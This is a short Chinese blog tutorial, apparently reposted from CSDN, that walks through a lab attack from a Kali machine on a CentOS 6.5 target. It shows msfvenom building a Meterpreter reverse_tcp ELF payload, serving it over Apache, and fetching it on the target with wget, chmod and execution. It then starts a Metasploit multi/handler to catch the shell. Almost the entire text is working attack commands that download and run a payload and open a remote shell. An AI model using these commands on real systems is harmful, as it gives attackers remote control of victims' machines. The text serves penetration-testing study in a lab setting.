转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633254
攻击机 Kali 192.168.175.128
靶机 CentOS 6.5 192.168.175.132
1.生成elf文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=5555 -f elf > /var/www/html/pay.elf
这里,我们将生成的pay.elf文件保存到了/var/www/html/目录下。
2.启动apache服务器
service apache2 start
3.在靶机上下载pay.elf
这里,假设我们经过一系列的渗透取得了靶机的权限,在靶机上执行如下命令
wget http://192.168.175.128/pay.elf
chmod a+x pay.elf
./pay.elf
4.在攻击机上执行攻击操作
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
setg LHOST 192.168.175.128
setg LPORT 5555
exploit
这样,我们就可以获取目标服务器的Meterpreter了。